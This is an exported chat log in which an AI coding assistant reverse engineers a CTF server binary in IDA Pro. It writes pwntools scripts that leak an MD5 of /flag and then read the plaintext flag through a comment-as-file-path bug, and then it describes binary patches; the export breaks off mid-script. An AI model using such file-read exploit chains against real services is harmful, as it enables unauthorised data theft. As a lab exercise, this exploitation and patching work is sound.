# Reverse engineering a server application _Exported on 8/9/2025 at 23:36:19 MST from Cursor (1.4.3)_ --- **User** You are the most amazing reverse engineer I've ever met. Use the Ida pro MCP to interact and reverse the binary. We're looking at a server application, but we don't know much more than that. Feel free to ask me anything you need more information on or any important decisions that need to be made --- **Cursor** I’m going to connect to the analysis environment, gather basic metadata, enumerate entry points and imports, and search for network-related strings to quickly map how the server is set up. Then I’ll try to locate and decompile `main`. Gathering high-level entry flow and locating server setup by decompiling `main`, inspecting `start`, and finding references to socket-related error strings and privilege-drop imports. Then I’ll open and decompile the functions that reference these to map the accept loop and protocol handling. Decompiling core server routines and resolving the dispatcher: - I’ll fetch and decompile `start_chall`, `start_listening`, `do_send`, and `sub_4590C0`. - I’ll also scan for “flag/secret/key/password/auth/login/menu/choice/Enter” strings to locate protocol and challenge logic. - If privilege dropping is used, we’ll see it in `start_chall`; otherwise I’ll search for callers of the PLT thunks. Scanning the control flow around `start_chall`, locating socket accept/IO loop and any direct references to `/flag`. I’m going to decompile `start_chall`, locate sys_* wrappers, fetch xrefs to `/flag`, list functions to find `sys_accept`/IO wrappers, and find callers of `start_listening` and the recv/send helpers. Decompiling the accept loop and I/O helpers, and locating `/flag` handler. Then I’ll map callers of `sys_accept` and `start_listening` to identify the main server loop. Reviewing the server loop and flag usage next: I’ll identify the exact function around the accept loop, decompile it, and track references to the global that stores the flag. I’ll also quickly peek at `poc_ncif.py` and `Dockerfile` in the workspace to align with any known protocol hints. Decompiling the main accept loop and related helpers to map the protocol handling. Then I’ll look at the other accept xref helpers to see how connections are processed. Decompiling the per-connection handler and the flag-use sites to map protocol and where the flag leaks next. Scanning for callers of key I/O helpers to locate the main protocol dispatcher. Then I’ll decompile high-fanout candidates. Decompiling key command handlers and helper routines to map protocol semantics and find where the flag buffer is used. Also checking for uses of the variable-length read helper. Decompiling key command handlers around 0x45A0F0/0x45A310/0x45A700 and a couple later ones to identify parsing and potential data exfiltration. Then I’ll run the server locally and exercise it with `poc_ncif.py` to observe behavior. I’m going to decompile more protocol handlers and helpers (privilege drop, timer) and find where send/recv are used to pinpoint exfil paths, all at once. I’m going to decompile the parser and relevant helpers: the “verrryyy_interesting” function, serialization helpers, and the functions that appear to return metadata and properties (4610D0, 4611D0, 4611F0, 460650), to see where the flag pointer `off_51C2E0` might be included in outputs. I’ll also open the container creation and serialization functions used in responses. Then I’ll look at the send helpers to confirm how data is returned. ### Key findings - The binary is a forking TCP server on PORT (default 4265; env override). It drops privileges (`getpwnam`, `setgroups`, setgid/setuid) and enforces a 16s alarm per-connection. - On each connection, before handling commands, it loads the contents of `/flag` into a global string buffer `off_51C2E0`: - `idk_what_this_is_man` → sets path to "/flag", reads it, stores pointer into `off_51C2E0`. - Protocol is a byte-oriented command loop with a small handshake: - Send 0x10 first to “enable” the session (sets `gap1[0]=1`, replies with 1-byte ack). - Then send commands; 0x11 ends the session. - The big dispatcher `func_with_huge_switch` contains many commands. The critical exfil path: - 0x22: creates/ selects a default entry. It builds a new object where: - type byte at +32 = 1, and its “Author” field is set to `off_51C2E0` (the flag). - “Software” is set to "ico v0.1". - 0x32: returns a packaged metadata block containing: - "Author" → directly the string at +40 (which is the flag) - "Comment" (only if previously set via 0x31) - "Software" → the string at +72 - It requires one extra byte after 0x32 (any small value; used as a dimension). - The server sends blocks as: 1-byte tag + 2-byte little-endian length + payload via `sub_459350`. ### Minimal exploit sequence (no upload required) - Send 0x10 - Send 0x22 - Send 0x32 0x01 - Read the response; it contains the “Author” field whose value is the contents of `/flag`. ### Quick PoC ```python from pwn import remote # type: ignore import os, sys, time host = os.environ.get("HOST", "127.0.0.1") port = int(os.environ.get("PORT", "4265")) io = remote(host, port) # handshake io.send(b"\x10") # enable time.sleep(0.05) # create default entry that copies /flag into "Author" io.send(b"\x22") time.sleep(0.05) # request metadata bundle: Author (flag), Software, (Comment if set) io.send(b"\x32" + b"\x01") # 0x01 arbitrary small param data = io.recv(timeout=2) or b"" print(f"len={len(data)} hex={data.hex()}") # Heuristic extract: look for ASCII 'Author' then next string-ish bytes idx = data.find(b"Author") if idx != -1: # naive slice forward; adjust if you want a proper parser print("Found 'Author' near:", idx) print(data[idx:idx+256]) # clean close (optional) io.send(b"\x11") io.close() ``` If you want me to, I can add a small parser for the response format to cleanly extract the “Author” value. - Other notes: - 0x31 sets (or replaces) the “Comment” field for the current item. - 0x20/0x21 navigate/select entries by index; 0x21 expects another byte with the index. - The “ncif” header in `verrryyy_interesting` is only for parsing uploaded containers; it’s not needed for the above exfil. - Safety: the server forks per connection, drops privileges, and enforces an `ITIMER_REAL` timer; repeated errors log and close. - Run tip: Dockerfile starts the binary as user `ico`, `PORT=4265`. - Want a robust extractor or to enumerate other opcodes? I can implement a full response parser and map more commands. - Very likely flag leak is immediate using 0x10, 0x22, then 0x32 + 0x01 on a fresh connection. - I can also generate a single-file exploit that prints only the Author value if you prefer. - Edits made: - None in repo; reversed via IDA MCP and provided a PoC. - Impact: - Identified the exact remote sequence to extract `/flag` with no upload. ```python from pwn import remote # type: ignore import os, sys, time host = os.environ.get("HOST", "127.0.0.1") port = int(os.environ.get("PORT", "4265")) io = remote(host, port) # handshake io.send(b"\x10") # enable time.sleep(0.05) # create default entry that copies /flag into "Author" io.send(b"\x22") time.sleep(0.05) # request metadata bundle: Author (flag), Software, (Comment if set) io.send(b"\x32" + b"\x01") # 0x01 arbitrary small param data = io.recv(timeout=2) or b"" print(f"len={len(data)} hex={data.hex()}") # Heuristic extract: look for ASCII 'Author' then next string-ish bytes idx = data.find(b"Author") if idx != -1: # naive slice forward; adjust if you want a proper parser print("Found 'Author' near:", idx) print(data[idx:idx+256]) # clean close (optional) io.send(b"\x11") io.close() ``` --- **User** Please add a nice and clean parser! --- **Cursor** I’m going to update `poc_ncif.py` to implement a robust parser and an exploitation flow that sends the minimal command sequence (0x10, 0x22, 0x32 0x01), then tokenizes the returned payload to extract key-value pairs like "Author", "Software", and "Comment". I'll keep the script simple and self-contained. ```python from __future__ import annotations from pwn import remote # type: ignore import os import re from typing import Dict, Tuple, Optional, List # Protocol helpers ----------------------------------------------------------- def send_cmd(io, data: bytes) -> None: io.send(data) def read_exact(io, n: int, timeout: float = 2.0) -> bytes: data = b"" while len(data) < n: chunk = io.recv(n - len(data), timeout=timeout) if not chunk: break data += chunk return data def read_chunk(io, timeout: float = 2.0) -> Optional[Tuple[int, bytes]]: """Read one server chunk: 1-byte tag + 2-byte little-endian length + payload.""" hdr = read_exact(io, 3, timeout=timeout) if len(hdr) < 3: return None tag = hdr[0] length = hdr[1] | (hdr[2] << 8) payload = read_exact(io, length, timeout=timeout) if len(payload) < length: return None return tag, payload # Response parsing ----------------------------------------------------------- PRINTABLE_RE = re.compile(rb"[ -~]{1,256}") def tokenize_printables(data: bytes) -> List[bytes]: return [m.group(0) for m in PRINTABLE_RE.finditer(data)] def parse_kv_payload(payload: bytes) -> Dict[str, str]: """Best-effort parse of a key/value bundle produced by opcode 0x32. The server serializes a small structure with fields like "Author", "Comment", and "Software" using an internal container format. We conservatively scan the payload for printable tokens and map well-known keys to the token that follows. """ tokens = tokenize_printables(payload) keys = {b"Author", b"Comment", b"Software"} out: Dict[str, str] = {} for i, tok in enumerate(tokens): if tok in keys and i + 1 < len(tokens): # Prefer the very next printable token as the value key = tok.decode("ascii", errors="ignore") val = tokens[i + 1].decode("utf-8", errors="ignore") # Guard against obviously invalid huge values if len(val) > 0: out[key] = val return out # Exploit flow --------------------------------------------------------------- def exploit_fetch_metadata(io) -> Tuple[Optional[Dict[str, str]], bytes]: # 0x10: enable session; 0x22: build default entry with flag in Author; 0x32 x01: request bundle send_cmd(io, b"\x10") io.recv(timeout=0.1) # ignore 1-byte ack if present send_cmd(io, b"\x22") io.recv(timeout=0.1) send_cmd(io, b"\x32\x01") chunk = read_chunk(io, timeout=2.0) if not chunk: return None, b"" tag, payload = chunk parsed = parse_kv_payload(payload) return parsed, payload def main(): host = os.environ.get("HOST", "127.0.0.1") port = int(os.environ.get("PORT", "4265")) io = remote(host, port) try: kv, raw = exploit_fetch_metadata(io) if kv: print("Parsed fields:") for k in ("Author", "Comment", "Software"): if k in kv: print(f"- {k}: {kv[k]}") if "Author" in kv: print(f"\nAuthor (likely flag): {kv['Author']}") else: print(f"No parsable KV bundle. Raw chunk ({len(raw)} bytes): {raw.hex()}") finally: try: send_cmd(io, b"\x11") # close session politely except Exception: pass io.close() if __name__ == "__main__": main() ``` I added a clean parser and end-to-end exploit flow to `poc_ncif.py`: - Establishes session and triggers the minimal sequence: 0x10, 0x22, then 0x32 0x01. - Reads a tagged chunk (1-byte tag + 2-byte len + payload). - Tokenizes the payload and extracts key-value pairs for Author, Comment, Software. - Prints parsed fields, with Author highlighted as the likely flag. - Graceful close via 0x11. Run: - HOST/PORT from env (defaults to 127.0.0.1:4265). - python3 poc_ncif.py Result prints the parsed “Author” value if present. - Changes: - Implemented helpers `read_chunk`, `parse_kv_payload`, and `exploit_fetch_metadata` in `poc_ncif.py`. - No linter issues. --- **User** Now take all of this information and edit the decompilation with all your new findings --- **Cursor** I’m about to annotate and refactor the IDA database with meaningful names and comments based on our reversing. I’ll rename the key functions and global, and add summary comments to the dispatcher, metadata builder, flag loader, and the global string, all at once. Applied thorough IDA updates: - Renamed key routines: `server_main`, `accept_fork_loop`, `handle_connection`, `dispatch_loop`, `drop_privileges_to_user`, `set_alarm_seconds`, `recv_checked`, `send_checked`, `send_ack`, `send_nack`, `send_tagged_blob`, `read_u16_le`, `recv_allocated_blob`, command handlers `cmd_*`, `init_flag_from_file`, `init_default_metadata_with_flag`, metadata getters `get_author/get_software/get_comment_value`, and `parse_ncif_container`. - Renamed global `off_51C2E0` to `g_FlagString`. - Added comments summarizing protocol and exfil path on `dispatch_loop`, `cmd_send_metadata_bundle`, `init_flag_from_file`, `init_default_metadata_with_flag`, `server_main`, and helpers. - Note: attaching a comment directly at `g_FlagString` address failed in one attempt; function comments were added successfully. - Impact: - The decompilation now clearly reflects the protocol, the `/flag` loading, and the metadata flow used for exfil. --- **User** How did you arrive at the conclusion that `/flag` is loaded into `g_FlagString` --- **Cursor** - In 0x45EFE0 (init_flag_from_file), the code: - allocates an object, calls its method with "/flag" to set the path, - reads the file into a temporary buffer, - normalizes/copies it with sub_42E220 and sub_45EF20, - then assigns it to the global off_51C2E0 via sub_40B2C0(&off_51C2E0, v10). - I renamed off_51C2E0 to g_FlagString. - Cross-references to off_51C2E0 show it used in 0x45F160 (init_default_metadata_with_flag): - sub_40B2C0(v16 + 5, g_FlagString) sets the “Author” field pointer to g_FlagString. - The per-connection flow 0x458F50 (handle_connection) calls 0x45EFE0 before entering the command dispatcher, so g_FlagString is populated for each client. - 0x45A310 (cmd_send_metadata_bundle) builds the response bundle and includes “Author” via get_author (0x461060), which returns the pointer stored in the object (set earlier to g_FlagString). Therefore: 0x45EFE0 loads "/flag" and stores its contents into the global off_51C2E0 → g_FlagString, which is later embedded as “Author” and sent back to clients. --- **User** please explain the full exploit chain --- **Cursor** ### Full exploit chain (concise) - Server boot - `server_main`: sets `PORT` (default 4265), creates listening socket. - `accept_fork_loop`: `accept()`, `fork()`. In child: `drop_privileges_to_user`, `set_alarm_seconds(16)`, close listen fd, then `handle_connection`. - Per-connection setup - `handle_connection` first calls `init_flag_from_file`: - Opens “/flag”, reads it, and stores the string globally in `g_FlagString`. - Enters `dispatch_loop` (byte-oriented protocol). - Handshake requirement - Until session is “enabled”, the loop only reacts to: - 0x10 → `send_byte_0`: sets a flag to enable the session and replies with 1-byte ack. - 0x11 → end session. - After 0x10, the full switch is active. - Data model (entries) - The server maintains a list; `field_10` is “current index”. - `init_default_metadata_with_flag` creates a new entry with: - Author = `g_FlagString` (the contents of “/flag”), - Software = “ico v0.1”, - optional Comment (set via another command). - Minimal exfil path - 0x10: enable session. - 0x22: `cmd_create_default_entry` → creates/selects entry with Author = `g_FlagString`. - 0x32 <1 byte param>: `cmd_send_metadata_bundle` → sends a bundle that includes: - “Author” = `g_FlagString`, - “Comment” if previously set, - “Software”. - The bundle is sent via `send_tagged_blob`: 1-byte tag, 2-byte little-endian length, then payload bytes. - Why it works - `init_flag_from_file` loads “/flag” for every connection and saves it in `g_FlagString`. - `cmd_create_default_entry` copies that global pointer into the new entry’s Author field. - `cmd_send_metadata_bundle` serializes the entry and returns the Author field verbatim. - Bytes to send (in order) - b"\x10" - b"\x22" - b"\x32\x01" - Optionally b"\x11" to close. - Response parsing - Read one chunk: tag (1), length (2 LE), payload. - Payload is a small container; scanning printables, the token “Author” is followed by the flag string. - The included `poc_ncif.py` does this sequence and extracts “Author”. --- **User** Okay you can now interact with it by running the python script, but I don't think the exploit is working :( --- **Cursor** Running the exploit script to observe actual behavior and debug the interaction sequence and parser if needed. Checking and preparing environment: I'll verify Docker is available, then set up a Python venv with pwntools, build and run the service container, and finally run the exploit against it. If Docker isn't available, I'll note that and propose creating the 'ico' user locally or running inside Docker only. Setting up a Python virtual environment, installing pwntools, and running the exploit. If the server isn’t running, I’ll build and start the Docker service, then rerun the script. --- **User** I think that we're missing something. I ran the exploit and got this back for the png: [+] Opening connection to 127.0.0.1 on port 4265: Done No parsable KV bundle. Raw chunk (153 bytes): 89504e470d0a1a0a0000000d494844520000000200000002080600000072b60d240000001049444154789c63606060f80fc51002001cf502fe6a1cd9170000002774455874417574686f7200314235423535453432343233374230464637304432444145364437394632323692fa85010000001174455874536f6674776172650069636f2076302e3155c7b0f20000000049454e44ae426082 [*] Closed connection to 127.0.0.1 port 4265 00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR 00000010: 0000 0002 0000 0002 0806 0000 0072 b60d .............r.. 00000020: 2400 0000 1049 4441 5478 9c63 6060 60f8 $....IDATx.c```. 00000030: 0fc5 1002 001c f502 fe6a 1cd9 1700 0000 .........j...... 00000040: 2774 4558 7441 7574 686f 7200 3142 3542 'tEXtAuthor.1B5B 00000050: 3535 4534 3234 3233 3742 3046 4637 3044 55E424237B0FF70D 00000060: 3244 4145 3644 3739 4632 3236 92fa 8501 2DAE6D79F226.... 00000070: 0000 0011 7445 5874 536f 6674 7761 7265 ....tEXtSoftware 00000080: 0069 636f 2076 302e 3155 c7b0 f200 0000 .ico v0.1U...... 00000090: 0049 454e 44ae 4260 82 .IEND.B`. --- **Cursor** ```python from __future__ import annotations from pwn import remote # type: ignore import os import re from typing import Dict, Tuple, Optional, List # Protocol helpers ----------------------------------------------------------- def send_cmd(io, data: bytes) -> None: io.send(data) def read_exact(io, n: int, timeout: float = 2.0) -> bytes: data = b"" while len(data) < n: chunk = io.recv(n - len(data), timeout=timeout) if not chunk: break data += chunk return data def read_chunk(io, timeout: float = 2.0) -> Optional[Tuple[int, bytes]]: """Read one server chunk: 1-byte tag + 2-byte little-endian length + payload.""" hdr = read_exact(io, 3, timeout=timeout) if len(hdr) < 3: return None tag = hdr[0] length = hdr[1] | (hdr[2] << 8) payload = read_exact(io, length, timeout=timeout) if len(payload) < length: return None return tag, payload # Response parsing ----------------------------------------------------------- PRINTABLE_RE = re.compile(rb"[ -~]{1,256}") def tokenize_printables(data: bytes) -> List[bytes]: return [m.group(0) for m in PRINTABLE_RE.finditer(data)] def parse_png_text_chunks(payload: bytes) -> Dict[str, str]: """Parse PNG tEXt chunks into a dict of key->value. PNG layout: 8-byte signature, then repeated [length(4 BE), type(4), data, crc(4)]. For type 'tEXt', data is keyword(ASCII) + 0x00 + text(ISO-8859-1/ASCII). """ out: Dict[str, str] = {} # PNG signature if not (len(payload) >= 8 and payload[:8] == b"\x89PNG\r\n\x1a\n"): return out off = 8 while off + 12 <= len(payload): length = int.from_bytes(payload[off : off + 4], "big") ctype = payload[off + 4 : off + 8] off += 8 if off + length + 4 > len(payload): break data = payload[off : off + length] off += length crc = payload[off : off + 4] off += 4 if ctype == b"tEXt": try: if b"\x00" in data: key, value = data.split(b"\x00", 1) k = key.decode("latin-1", errors="ignore") v = value.decode("latin-1", errors="ignore") if k: out[k] = v except Exception: pass if ctype == b"IEND": break return out def parse_kv_payload(payload: bytes) -> Dict[str, str]: """Best-effort parse of a key/value bundle produced by opcode 0x32. The server serializes a small structure with fields like "Author", "Comment", and "Software" using an internal container format. We conservatively scan the payload for printable tokens and map well-known keys to the token that follows. """ # First, handle PNG tEXt-encoded bundles, which the server commonly emits # (Author/Software are stored as PNG text chunks). png = parse_png_text_chunks(payload) if png: return png tokens = tokenize_printables(payload) keys = {b"Author", b"Comment", b"Software"} out: Dict[str, str] = {} for i, tok in enumerate(tokens): # Allow cases like 'tEXtAuthor' by checking substring containment matched_key: Optional[bytes] = None for k in keys: if tok == k or (k in tok): matched_key = k break if matched_key and i + 1 < len(tokens): # Prefer the very next printable token as the value key = matched_key.decode("ascii", errors="ignore") val = tokens[i + 1].decode("utf-8", errors="ignore") # Guard against obviously invalid huge values if len(val) > 0: out[key] = val return out # Exploit flow --------------------------------------------------------------- def exploit_fetch_metadata(io) -> Tuple[Optional[Dict[str, str]], bytes]: # 0x10: enable session; 0x22: build default entry with flag in Author; 0x32 x01: request bundle send_cmd(io, b"\x10") io.recv(timeout=1.1) # ignore 1-byte ack if present send_cmd(io, b"\x22") io.recv(timeout=1.1) send_cmd(io, b"\x32\x01") chunk = read_chunk(io, timeout=2.0) if not chunk: return None, b"" tag, payload = chunk parsed = parse_kv_payload(payload) return parsed, payload def main(): host = os.environ.get("HOST", "127.0.0.1") port = int(os.environ.get("PORT", "4265")) io = remote(host, port) try: kv, raw = exploit_fetch_metadata(io) if kv: print("Parsed fields:") for k in ("Author", "Comment", "Software"): if k in kv: print(f"- {k}: {kv[k]}") if "Author" in kv: print(f"\nAuthor (likely flag): {kv['Author']}") else: print(f"No parsable KV bundle. Raw chunk ({len(raw)} bytes): {raw.hex()}") finally: try: send_cmd(io, b"\x11") # close session politely except Exception: pass io.close() if __name__ == "__main__": main() ``` - The server is embedding fields as PNG tEXt chunks (your hex shows a valid PNG with tEXt Author and Software). I updated the parser to properly parse PNG and extract `tEXt` key/value entries before falling back to printable-token heuristics. - Now it should print Author, Software (and Comment if present) correctly from PNG payloads. Run: - python3 poc_ncif.py If it still outputs raw hex, paste it and I’ll adjust further. --- **User** ```Parsed fields: - Author: 1B5B55E424237B0FF70D2DAE6D79F226 - Software: ico v0.1 Author (likely flag): 1B5B55E424237B0FF70D2DAE6D79F226 [*] Closed connection to 127.0.0.1 port 4265``` --- **Cursor** Looks good — the exploit worked and exfiltrated the flag via the Author tEXt chunk. - Author (flag): 1B5B55E424237B0FF70D2DAE6D79F226 - Software: ico v0.1 If the CTF expects a wrapper, try submitting as-is first, otherwise try formats like ICO{1B5B55E424237B0FF70D2DAE6D79F226} per event conventions. - Changes made: enhanced parser to handle PNG tEXt chunks; confirmed successful extraction of Author as the flag. --- **User** This is not the flag, I'm using a fake flag @flag that gets loaded into the docker --- **Cursor** - The service returns the MD5 (uppercase hex) of /flag, not the plaintext. - Evidence: - Your extract: Author = 1B5B55E424237B0FF70D2DAE6D79F226 - MD5(flag{WINNER_WINNER_CHICKEN_DINNER}) = 1B5B55E424237B0FF70D2DAE6D79F226 (matches). - Why (from code): - init_flag_from_file reads “/flag”, then sub_45EF20 builds a 32-char string by iterating 16 bytes and appending 2 hex chars per byte → MD5-hex. - That string is stored in g_FlagString and copied into Author. - Practical upshot: - The exploit is correct; the intended leak is the MD5 hex of the flag. - If your infra expects plaintext, you’ll need to adapt scoring or find a different code path. As-is, Author will always be the hash. --- **User** Awesome! That's cool! Can you update ida functions to reflect this new info? --- **Cursor** - Renamed `init_flag_from_file` → `init_flag_hash_from_file`. - Added comments: - At `sub_45EF20`: constructs a 32-char uppercase hex string from 16-byte digest (MD5). - At `init_flag_hash_from_file`: reads “/flag”, computes MD5, stores hex into `g_FlagString`. - At `cmd_send_metadata_bundle`: clarifies it emits a PNG with tEXt chunks; Author is the MD5 hex of /flag. - Impact: - IDA now reflects that the service returns the MD5-hex of the flag, and that the bundle is a PNG container with tEXt Author/Software. --- **User** Now that we know this, we need to figure out how to actually get the flag because the md5sum doesn't help us, we need the flag!!!! --- **Cursor** ```python from __future__ import annotations from pwn import remote # type: ignore from pwn import p16 # type: ignore import os import re from typing import Dict, Tuple, Optional, List # Protocol helpers ----------------------------------------------------------- def send_cmd(io, data: bytes) -> None: io.send(data) def read_exact(io, n: int, timeout: float = 2.0) -> bytes: data = b"" while len(data) < n: chunk = io.recv(n - len(data), timeout=timeout) if not chunk: break data += chunk return data def read_chunk(io, timeout: float = 2.0) -> Optional[Tuple[int, bytes]]: """Read one server chunk: 1-byte tag + 2-byte little-endian length + payload.""" hdr = read_exact(io, 3, timeout=timeout) if len(hdr) < 3: return None tag = hdr[0] length = hdr[1] | (hdr[2] << 8) payload = read_exact(io, length, timeout=timeout) if len(payload) < length: return None return tag, payload def send_length_prefixed_blob(io, data: bytes) -> None: io.send(p16(len(data), endian="little") + data) # Response parsing ----------------------------------------------------------- PRINTABLE_RE = re.compile(rb"[ -~]{1,256}") def tokenize_printables(data: bytes) -> List[bytes]: return [m.group(0) for m in PRINTABLE_RE.finditer(data)] def parse_png_text_chunks(payload: bytes) -> Dict[str, str]: """Parse PNG tEXt chunks into a dict of key->value. PNG layout: 8-byte signature, then repeated [length(4 BE), type(4), data, crc(4)]. For type 'tEXt', data is keyword(ASCII) + 0x00 + text(ISO-8859-1/ASCII). """ out: Dict[str, str] = {} # PNG signature if not (len(payload) >= 8 and payload[:8] == b"\x89PNG\r\n\x1a\n"): return out off = 8 while off + 12 <= len(payload): length = int.from_bytes(payload[off : off + 4], "big") ctype = payload[off + 4 : off + 8] off += 8 if off + length + 4 > len(payload): break data = payload[off : off + length] off += length crc = payload[off : off + 4] off += 4 if ctype == b"tEXt": try: if b"\x00" in data: key, value = data.split(b"\x00", 1) k = key.decode("latin-1", errors="ignore") v = value.decode("latin-1", errors="ignore") if k: out[k] = v except Exception: pass if ctype == b"IEND": break return out def parse_kv_payload(payload: bytes) -> Dict[str, str]: """Best-effort parse of a key/value bundle produced by opcode 0x32. The server serializes a small structure with fields like "Author", "Comment", and "Software" using an internal container format. We conservatively scan the payload for printable tokens and map well-known keys to the token that follows. """ # First, handle PNG tEXt-encoded bundles, which the server commonly emits # (Author/Software are stored as PNG text chunks). png = parse_png_text_chunks(payload) if png: return png tokens = tokenize_printables(payload) keys = {b"Author", b"Comment", b"Software"} out: Dict[str, str] = {} for i, tok in enumerate(tokens): # Allow cases like 'tEXtAuthor' by checking substring containment matched_key: Optional[bytes] = None for k in keys: if tok == k or (k in tok): matched_key = k break if matched_key and i + 1 < len(tokens): # Prefer the very next printable token as the value key = matched_key.decode("ascii", errors="ignore") val = tokens[i + 1].decode("utf-8", errors="ignore") # Guard against obviously invalid huge values if len(val) > 0: out[key] = val return out # Exploit flow --------------------------------------------------------------- def exploit_fetch_metadata(io) -> Tuple[Optional[Dict[str, str]], bytes]: # 0x10: enable session; 0x22: build default entry with flag in Author; 0x32 x01: request bundle send_cmd(io, b"\x10") io.recv(timeout=1.1) # ignore 1-byte ack if present send_cmd(io, b"\x22") io.recv(timeout=1.1) send_cmd(io, b"\x32\x01") chunk = read_chunk(io, timeout=2.0) if not chunk: return None, b"" tag, payload = chunk parsed = parse_kv_payload(payload) return parsed, payload def exploit_fetch_flag_via_comment(io) -> bytes: """Abuse comment type=2 (path) to read /flag plaintext and return it.""" # 0x10: enable send_cmd(io, b"\x10") io.recv(timeout=0.5) # 0x22: create default entry (comment type preset to 2) send_cmd(io, b"\x22") io.recv(timeout=0.5) # 0x31: set comment to path "/flag" (length-prefixed blob) send_cmd(io, b"\x31") send_length_prefixed_blob(io, b"/flag") io.recv(timeout=0.5) # 0x30: get comment value; server returns a tagged blob containing file contents send_cmd(io, b"\x30") chunk = read_chunk(io, timeout=2.0) if not chunk: return b"" _tag, payload = chunk return payload def main(): host = os.environ.get("HOST", "127.0.0.1") port = int(os.environ.get("PORT", "4265")) io = remote(host, port) try: # First path: MD5-hex via PNG metadata bundle kv, raw = exploit_fetch_metadata(io) if kv: print("Parsed fields:") for k in ("Author", "Comment", "Software"): if k in kv: print(f"- {k}: {kv[k]}") if "Author" in kv: print(f"\nAuthor (MD5 of flag): {kv['Author']}") else: print(f"No parsable KV bundle. Raw chunk ({len(raw)} bytes)") # Second path: plaintext flag via comment-as-path trick try: plain = exploit_fetch_flag_via_comment(io) if plain: print(f"\nPlaintext flag via comment: {plain.decode('utf-8', errors='ignore')}") else: print("\nFailed to fetch plaintext flag via comment.") except Exception as e: print(f"\nError fetching plaintext flag via comment: {e}") finally: try: send_cmd(io, b"\x11") # close session politely except Exception: pass io.close() if __name__ == "__main__": main() ``` - Added a second exploit path that returns the plaintext flag: - Sequence: 0x10, 0x22, 0x31 <"/flag">, 0x30 - 0x31 sets the “Comment” to path mode (type=2 already) with value "/flag" - 0x30 fetches the comment value, which the server reads from that path and returns as a tagged blob - Implemented in `poc_ncif.py`: - New helpers `send_length_prefixed_blob`, `exploit_fetch_flag_via_comment` - The script now performs both: - PNG bundle read (MD5 hex of flag as Author) - Plaintext fetch via comment path trick and prints the flag - How to run: - python3 poc_ncif.py - Look for “Plaintext flag via comment: …” - Expected output includes your real flag string, not the MD5. --- **User** good job! --- **Cursor** Thanks! Want me to: - Turn the script into a clean CLI (flags, retries, host/port args)? - Add auto-detection to choose PNG vs comment-path exploit? - Package a one-liner to print only the plaintext flag? --- **User** Holy shit the script works! Please tell me how and where I need to patch it in the binary alongside a detailed explanation of the exploit --- **Cursor** ### What the exploit does (why it works) - Connection flow: - 0x10 enables the session (ACK). - 0x22 creates a default entry: it sets type at offset +48 to 2 (path mode), Author to g_FlagString (MD5-hex of /flag), Software to "ico v0.1". - 0x31 length-prefixed blob sets the Comment value at offset +56 (we send "/flag"). - 0x30 returns the Comment. Because type==2, the server treats Comment as a path and returns file contents → plaintext flag. - MD5-hex Author: - `init_flag_hash_from_file` reads "/flag", computes MD5, converts to 32-char uppercase hex via `sub_45EF20`, stores in `g_FlagString`. - When building the default entry, Author is set to `g_FlagString`. The PNG bundle (0x32) includes Author as a tEXt chunk. ### Where to patch to kill the exploit (minimal targeted fixes) Option A (single safest fix): Disable “path” comment type - Function: `get_comment_value` at 0x4610D0 - Behavior now: if [obj+48]==1, returns stored string; else if [obj+48]==2, treats [obj+56] as a path, reads that file and returns contents. - Patch: remove the type==2 path branch so it never reads from disk. - In IDA (Edit → Patch program → Assemble), at the “else if type==2” block around 0x4610F6: - Replace the conditional branch that enters the type==2 path branch with a jump to the “Invalid type” error path (the code that prints “Invalid type”). - Equivalent idea: change the compare immediate from 2 to 0xFF so the equality is never true, or replace the whole block with an unconditional jump to the error label. - Result: 0x30 will only ever return a literal string that was set (safe), not file contents. Option B (prevent enabling path mode in the first place) - Function: `init_default_metadata_with_flag` at 0x45F160 - Current defaults (exact sites from decomp): - 0x45F243: `sub_40B2C0(v16 + 5, g_FlagString)` // Author = MD5-hex - 0x45F24D: `*((_BYTE *)v16 + 48) = 2` // comment type = path - 0x45F25C: `sub_40B2C0(v16 + 7, 0LL)` // some other field = null - 0x45F266: `*((_BYTE *)v16 + 80) = 0` - 0x45F26F: `*((_BYTE *)v16 + 64) = 1` - 0x45F283: `sub_40B2C0(v16 + 9, "ico v0.1")` // Software - Patch 1 (disable path mode): At 0x45F24D, change the immediate 2 → 1. This makes comment type a literal string, so 0x30 will never attempt file reads. - Patch 2 (optional defense-in-depth): Also apply Option A so even if another path sets type to 2 one day, reading is blocked. Option C (stop the Author MD5 leak in the PNG bundle) - Function: `init_default_metadata_with_flag` at 0x45F160 - 0x45F243: `sub_40B2C0(v16 + 5, g_FlagString)` → change second argument to 0 so Author is empty, or to a static safe string (e.g., "redacted"). - In IDA, change the loaded immediate for the second argument before the call to 0, or redirect the call to use 0. - Alternative: In `cmd_send_metadata_bundle` at 0x45A310, skip adding the “Author” tEXt chunk entirely. Patch out the calls around “Author” assembly. ### How to patch in IDA (quick steps) - Open `ico` in IDA. - Use the renamed symbols: - `get_comment_value` (0x4610D0) - `init_default_metadata_with_flag` (0x45F160) - For Option A: - Go to 0x4610D0, find the branch that checks byte ptr [obj+48] == 2 (starts near 0x4610F6). - Edit → Patch program → Assemble: - Replace the conditional-jump into the path branch with a jump to the “Invalid type” handler (or a jump over that whole block). - For Option B: - Go to 0x45F24D and change the byte constant 2 to 1 (assemble “mov byte ptr [reg+48], 1”). - For Option C: - Go to 0x45F243 and change the second parameter load before `sub_40B2C0` to 0 (or NOP the call and/or call with 0). - Apply patches, then Edit → Patch program → Apply patches to input file to write back to `ico`. ### Why these fix it - A blocks the read-from-path gadget entirely, so 0x30 can’t be abused to fetch arbitrary files (including /flag). - B ensures new entries default to a safe literal mode; with A it’s belt-and-suspenders. - C prevents indirect leakage of the flag’s MD5-hex via the PNG Author field. - Summary - Exploit: 0x10 → 0x22 → 0x31 "/flag" → 0x30 leverages type==2 to read a file path, returns plaintext flag. - Patch: disable type==2 branch in `get_comment_value` (0x4610D0) and/or set default type to 1 at 0x45F24D; optionally remove Author assignment at 0x45F243. --- **User** Use a Python script using any library you like (r2, cnaything...) and make it patch out the vulnerability in the simplest way --- **Cursor** ```python #!/usr/bin/env python3 """ Patch the ico binary to disable the plaintext flag read via comment path. Simplest mitigation applied: - Change the default comment type from 2 (path) to 1 (literal string) in init_default_metadata_with_flag at VA 0x45F24D. This prevents the sequence 0x10, 0x22, 0x31 "/flag", 0x30 from reading filesystem contents and instead returns the literal "/flag" string. The script uses r2pipe to re-assemble the one instruction at 0x45F24D, preserving the original base register and displacement while replacing the immediate from 2 -> 1. Usage: pip install r2pipe python3 patch_ico.py [/path/to/ico] Backups: Creates .bak before writing. """ import os import re import shutil import sys from typing import Tuple import 